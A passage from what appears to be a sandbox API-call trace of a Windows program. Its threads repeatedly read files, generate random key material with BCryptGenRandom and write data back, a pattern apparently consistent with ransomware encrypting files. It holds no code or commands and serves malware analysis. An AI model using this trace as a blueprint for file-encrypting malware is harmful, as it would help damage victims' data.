lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0210.269] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.284] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0210.320] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.350] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0210.353] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.374] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10f78, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0210.375] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.386] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xa388, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0210.387] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.387] CloseHandle (hObject=0xec) returned 1 [0210.387] free (_Block=0x3df0008) [0210.387] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.400] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.400] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0210.400] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.401] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0210.401] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0210.401] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0210.401] free (_Block=0x3e305b8) [0210.401] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0210.401] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0210.401] free (_Block=0x1fa91d0) [0210.401] free (_Block=0x1fa2ed8) [0210.401] free (_Block=0x1fa90b8) [0210.401] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0210.402] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.402] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x6a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0210.402] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.411] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10d, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0210.411] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.412] CloseHandle (hObject=0xec) returned 1 [0210.412] free (_Block=0x3df0008) [0210.412] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.425] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.425] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0210.425] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.426] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0210.426] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0210.426] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0210.426] free (_Block=0x3e305b8) [0210.426] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0210.426] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0210.426] free (_Block=0x1fa91d0) [0210.426] free (_Block=0x1fa2ed8) [0210.426] free (_Block=0x1fa90b8) [0210.426] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0210.426] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.428] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x165f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0210.428] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.429] CloseHandle (hObject=0x308) returned 1 [0210.429] free (_Block=0x3df0008) [0210.429] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.432] CloseHandle (hObject=0x308) returned 1 [0210.432] free (_Block=0x3df0008) [0210.432] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.439] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.440] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0210.440] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.440] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0210.441] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0210.441] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0210.441] free (_Block=0x3e305b8) [0210.441] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0210.441] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0210.441] free (_Block=0x1fa91d0) [0210.441] free (_Block=0x1fa2ed8) [0210.441] free (_Block=0x1fa90b8) [0210.441] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0210.441] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.443] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb390, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0210.443] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.443] CloseHandle (hObject=0xec) returned 1 [0210.443] free (_Block=0x3df0008) [0210.443] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.451] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.452] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0210.452] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.452] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0210.452] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0210.452] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0210.452] free (_Block=0x3e305b8) [0210.452] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0210.452] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0210.453] free (_Block=0x1fa91d0) [0210.453] free (_Block=0x1fa2ed8) [0210.453] free (_Block=0x1fa90b8) [0210.453] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0210.453] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.453] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xd80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0210.453] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.465] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x860, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0210.465] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.465] CloseHandle (hObject=0xec) returned 1 [0210.465] free (_Block=0x3df0008) [0210.465] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.499] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.499] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.499] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0210.499] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.500] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.500] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0210.500] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0210.500] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0210.500] free (_Block=0x3e305b8) [0210.500] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0210.500] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0210.500] free (_Block=0x1fa91d0) [0210.500] free (_Block=0x1fa2ed8) [0210.500] free (_Block=0x1fa90b8) [0210.500] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0210.501] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.501] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xd80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0210.501] GetQueuedCompletionStatus (CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff) Thread: id = 16 os_tid = 0x904 [0069.072] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0076.673] ReadFile (in: hFile=0x16c, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xc600, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.674] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0076.698] ReadFile (in: hFile=0x16c, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x1303c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.700] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0076.716] ReadFile (in: hFile=0x16c, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.717] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0076.737] ReadFile (in: hFile=0x3a8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xca00, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.738] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0076.757] ReadFile (in: hFile=0x3a8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x3000, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.757] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0076.758] CloseHandle (hObject=0x3a8) returned 1 [0076.759] free (_Block=0x1fb18c0) [0076.759] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0076.771] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.771] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.771] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0076.771] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.772] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0076.772] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0076.772] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0076.772] free (_Block=0x77d800) [0076.772] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0076.772] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0076.773] free (_Block=0x1ff1930) [0076.773] free (_Block=0x1ff1a40) [0076.773] free (_Block=0x77d908) [0076.773] WriteFile (in: hFile=0x3a8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.773] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0076.774] WriteFile (in: hFile=0x3a8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x1c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.774] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0076.788] ReadFile (in: hFile=0x16c, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xddb8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.790] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0076.804] ReadFile (in: hFile=0x16c, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xa200, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.806] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0076.820] ReadFile (in: hFile=0x16c, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xa800, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.821] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0076.840] CloseHandle (hObject=0x16c) returned 1 [0076.842] free (_Block=0x1fb18c0) [0076.889] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0076.898] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.899] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.899] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0076.899] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.899] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.899] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0076.903] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0076.903] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0076.903] free (_Block=0x77d800) [0076.903] calloc (_Count=0x41, _Size=0x4) returned 0x2031ed0 [0076.903] calloc (_Count=0x82, _Size=0x4) returned 0x2031fe0 [0076.904] free (_Block=0x2031ed0) [0076.904] free (_Block=0x2031fe0) [0076.906] free (_Block=0x77d908) [0076.906] WriteFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0076.907] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0076.929] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.930] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0076.931] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.931] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 